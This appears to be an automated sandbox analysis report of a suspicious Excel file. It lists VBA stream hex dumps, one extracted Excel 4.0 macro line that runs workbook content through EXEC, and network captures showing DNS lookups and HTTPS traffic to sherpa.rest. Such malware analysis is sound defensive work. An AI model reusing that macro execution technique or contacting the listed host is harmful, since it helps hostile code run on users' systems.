                                                                                                                                                          Entropy:4.3476580333
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . 9 ] H . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:93 4b 2a a3 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 68 00 00 7f
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 191
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:191
                                                                                                                                                          Entropy:3.30829134406
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s e c o n d s . . . . . . . . D e l i m i t e r . . . . . . . . I g n o r e _ E m p t y . . . . . . . . T e x t 1 a . . . . . . .
                                                                                                                                                          Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 a1 03 00 00 00 00 00 00 81 08 00 00 00 00 00 00 08 00 00 00 00 00 01 00 02 00 00 08 07 00 00 00 73 65
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 384
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:384
                                                                                                                                                          Entropy:2.45306416855
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . ` . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 09 08 00 00 00 00 00 00 31 08 00 00 00 00 00 00 59 08 00 00 00 00 00 00 ff ff ff ff e1 07 00 00 00 00 00 00 08 00 18 00 34 00 00 00 81 08 00 00 00 00 00 00 61 00 00 00 00 00 01 00 a9 08
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 294
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:294
                                                                                                                                                          Entropy:2.65487119554
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . ( . . . . . . . . . . . . ` . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . & 8 . A . . . . . . . . . . ` . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 # o . . 0 $ . . . . . . . . . . . . ` . . i . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . l . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . .
                                                                                                                                                          Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 28 00 01 01 00 00 00 00 02 00 00 00 03 60 04 00 61 02 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01 00 00 00 00 00 1e 26 38 00 41 01 00 00 00 00 02 00 01 00 03 60 10 fd 65 02 ff ff ff ff ff ff ff ff ff ff 00 00
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: MIPSEL-BE Ucode, Stream Size: 902
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                          File Type:MIPSEL-BE Ucode
                                                                                                                                                          Stream Size:902
                                                                                                                                                          Entropy:6.58076213885
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . B . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                          Data Raw:01 82 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c2 42 a1 61 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                          "=RETURN(EXEC(GET.WORKBOOK(36,DOCUMENTS(1))))",,=1+1

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Nov 19, 2020 08:55:19.848890066 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:19.878330946 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.878441095 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:19.879019976 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:19.908390045 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.911714077 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.911746025 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.911758900 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.911838055 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:19.918428898 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:19.947875977 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.947994947 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.951216936 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:19.980967045 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:21.978830099 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:21.978873968 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:21.979068041 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:21.979769945 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:22.009512901 CET44349719104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.009630919 CET49719443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:22.035882950 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:22.065563917 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.065721989 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:22.068093061 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:22.099931955 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.100008011 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.100061893 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.100142002 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:22.100194931 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:22.119996071 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:22.149784088 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.149807930 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.150031090 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:22.151693106 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:22.181390047 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:25.212553978 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:25.212766886 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:25.222140074 CET49726443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:25.251995087 CET44349726104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:25.252108097 CET49726443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:25.252711058 CET49726443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:25.282305956 CET44349726104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:25.286920071 CET44349726104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:25.311943054 CET49726443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:25.313043118 CET49726443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:25.341367006 CET44349726104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:25.342783928 CET44349726104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:28.228908062 CET44349726104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:28.228935957 CET44349726104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:28.229162931 CET49726443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:28.229494095 CET49726443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:28.231627941 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:28.260252953 CET44349726104.27.172.15192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:28.260447979 CET49726443192.168.2.7104.27.172.15
                                                                                                                                                          Nov 19, 2020 08:55:28.261111975 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:31.245928049 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:31.246103048 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:31.274483919 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:31.304227114 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.263920069 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.263946056 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.263959885 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.263972044 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.263988018 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.264000893 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.264017105 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.264034986 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.264050007 CET44349723172.67.221.76192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:34.264123917 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:34.264163971 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:34.267493010 CET49723443192.168.2.7172.67.221.76
                                                                                                                                                          Nov 19, 2020 08:55:34.267533064 CET49723443192.168.2.7172.67.221.76

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Nov 19, 2020 08:55:03.690892935 CET5871753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:03.703077078 CET53587178.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:04.503283978 CET5976253192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:04.516273975 CET53597628.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:13.827972889 CET5432953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:13.840821028 CET53543298.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:15.054418087 CET5805253192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:15.067482948 CET53580528.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:16.108428955 CET5400853192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:16.128803968 CET53540088.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:16.396924973 CET5945153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:16.412990093 CET53594518.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:16.706808090 CET5291453192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:16.720577955 CET53529148.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:17.414170980 CET5945153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:17.427687883 CET53594518.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:18.378830910 CET6456953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:18.391457081 CET53645698.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:18.429977894 CET5945153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:18.443228006 CET53594518.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.315308094 CET5281653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:19.328758955 CET53528168.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:19.811559916 CET5078153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:19.847448111 CET53507818.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:20.372431040 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:20.386019945 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:20.441660881 CET5945153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:20.455090046 CET53594518.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:20.661062956 CET5491153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:20.673784971 CET53549118.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:21.364162922 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:21.377136946 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.002232075 CET4995853192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:22.031665087 CET53499588.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.379714966 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:22.393177032 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.810425997 CET5086053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:22.828685045 CET53508608.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:23.053925037 CET5045253192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:23.066096067 CET53504528.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:24.380263090 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:24.393002033 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:24.442250013 CET5945153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:24.455365896 CET53594518.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:28.395911932 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:28.408533096 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:31.556031942 CET5973053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:31.568850040 CET53597308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:37.624082088 CET5931053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:37.637690067 CET53593108.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:41.137947083 CET5191953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:41.151437044 CET53519198.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:42.451525927 CET6429653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:42.463757992 CET53642968.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:43.444963932 CET5668053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:43.459101915 CET53566808.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:45.399720907 CET5882053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:45.412800074 CET53588208.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:46.884980917 CET6098353192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:46.898097992 CET53609838.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:53.072124958 CET4924753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:53.090845108 CET53492478.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:53.560739040 CET5228653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:53.573664904 CET53522868.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:55.765737057 CET5606453192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:55.779037952 CET53560648.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:56.226586103 CET6374453192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:56.239907026 CET53637448.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:56.349257946 CET6145753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:56.362277031 CET53614578.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:56.701160908 CET5836753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:56.721797943 CET53583678.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.046128035 CET6059953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.059211016 CET53605998.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.128667116 CET5957153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.141024113 CET53595718.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.522999048 CET5268953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.535382032 CET53526898.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.718154907 CET5029053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.745742083 CET53502908.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.947175026 CET6042753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.960751057 CET53604278.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:58.415807962 CET5620953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:58.428867102 CET53562098.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:59.124157906 CET5958253192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:59.137289047 CET53595828.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:00.187294006 CET6094953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:00.200376987 CET53609498.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:00.803838015 CET5854253192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:00.816900015 CET53585428.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:03.864377022 CET5917953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:03.884466887 CET53591798.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:32.229438066 CET6092753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:32.263771057 CET53609278.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:34.892143011 CET5785453192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:34.904783964 CET53578548.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:54.737792969 CET6202653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:54.750781059 CET53620268.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:49.896569967 CET5945353192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:49.909166098 CET53594538.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:50.216155052 CET6246853192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:50.228629112 CET53624688.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:50.648753881 CET5256353192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:50.674897909 CET53525638.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:54.137573957 CET5472153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:54.171084881 CET53547218.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:57.826704979 CET6282653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:57.853064060 CET53628268.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:58.106853962 CET6204653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:58.120014906 CET53620468.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 09:00:14.674246073 CET5122353192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 09:00:14.722126007 CET53512238.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 09:01:57.797785044 CET6390853192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 09:01:57.810509920 CET53639088.8.8.8192.168.2.7

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Nov 19, 2020 08:55:19.811559916 CET192.168.2.78.8.8.80xa688Standard query (0)sherpa.restA (IP address)IN (0x0001)
                                                                                                                                                          Nov 19, 2020 08:55:22.002232075 CET192.168.2.78.8.8.80x84a7Standard query (0)sherpa.restA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Nov 19, 2020 08:55:19.847448111 CET8.8.8.8192.168.2.70xa688No error (0)sherpa.rest104.27.172.15A (IP address)IN (0x0001)
                                                                                                                                                          Nov 19, 2020 08:55:19.847448111 CET8.8.8.8192.168.2.70xa688No error (0)sherpa.rest104.27.173.15A (IP address)IN (0x0001)
                                                                                                                                                          Nov 19, 2020 08:55:19.847448111 CET8.8.8.8192.168.2.70xa688No error (0)sherpa.rest172.67.221.76A (IP address)IN (0x0001)
                                                                                                                                                          Nov 19, 2020 08:55:22.031665087 CET8.8.8.8192.168.2.70x84a7No error (0)sherpa.rest172.67.221.76A (IP address)IN (0x0001)
                                                                                                                                                          Nov 19, 2020 08:55:22.031665087 CET8.8.8.8192.168.2.70x84a7No error (0)sherpa.rest104.27.173.15A (IP address)IN (0x0001)
                                                                                                                                                          Nov 19, 2020 08:55:22.031665087 CET8.8.8.8192.168.2.70x84a7No error (0)sherpa.rest104.27.172.15A (IP address)IN (0x0001)

                                                                                                                                                          HTTPS Packets

                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                          Nov 19, 2020 08:55:19.911746025 CET104.27.172.15443192.168.2.749719CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESun Nov 01 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020Mon Nov 01 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Nov 19, 2020 08:55:22.100061893 CET172.67.221.76443192.168.2.749723CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESun Nov 01 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020Mon Nov 01 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                                                                          Code Manipulations

                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

